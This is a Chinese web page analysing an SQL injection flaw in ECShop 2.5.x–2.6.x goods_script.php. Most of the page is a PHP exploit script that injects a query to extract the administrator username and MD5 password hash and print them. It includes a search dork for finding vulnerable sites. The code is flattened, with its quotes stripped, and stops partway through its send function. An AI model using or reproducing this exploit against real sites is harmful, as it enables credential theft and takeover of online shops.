软件开发培训班 >> 网络技术 >> 网络安全
ECShop 注射漏洞分析 |
|
本文标签:ECShop,注射 影响2.5.x和2.6.x,其他版本未测试 goods_script.php 44行: 复制代码 代码如下:if (empty($_GET[type])) { ... } elseif ($_GET[type] == collection) { ... } $sql .= " LIMIT " . (!empty($_GET[goods_num]) ? intval($_GET[goods_num]) : 10); $res = $db->query($sql); $sql没有初始化,很明显的一个漏洞:) EXP: 复制代码 代码如下:#!/usr/bin/php <?php print_r( +---------------------------------------------------------------------------+ ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit by puret_t mail: puretot at gmail dot com team: http://bbs.wolvez.org dork: "Powered by ECShop" +---------------------------------------------------------------------------+ ); /** * works with register_globals = On */ if ($argc < 3) { print_r( +---------------------------------------------------------------------------+ Usage: php .$argv[0]. host path host: target server (ip/hostname) path: path to ecshop Example: php .$argv[0]. localhost /ecshop/ +---------------------------------------------------------------------------+ ); exit; } error_reporting(7); ini_set(max_execution_time, 0); $host = $argv[1]; $path = $argv[2]; $resp = send(); preg_match(#href="([\S]+):([a-z0-9]{32})"#, $resp, $hash); if ($hash) exit("Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n"); else exit("Exploit Failed!\n"); function send() { global $host, $path; $cmd = sql=SELECT CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user WHERE action_list=0x.bin2hex(all). LIMIT 1#; $data = "POST ".$path."goods_script.php?type=".time()." HTTP/1.1\r\n"; $data .= "Accept: */*\r\n"; $data .= "Accept-Language: zh-cn\r\n"; $data .= "Content-Type: application/x-www-form-urlencoded\r\n"; $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; $data .= "Host: $host\r\n"; $data .= "Content-Length: ".strlen($cmd)."\r\n"; $data .= "Connection: Close\r\n\r\n"; $data .= $cmd; |
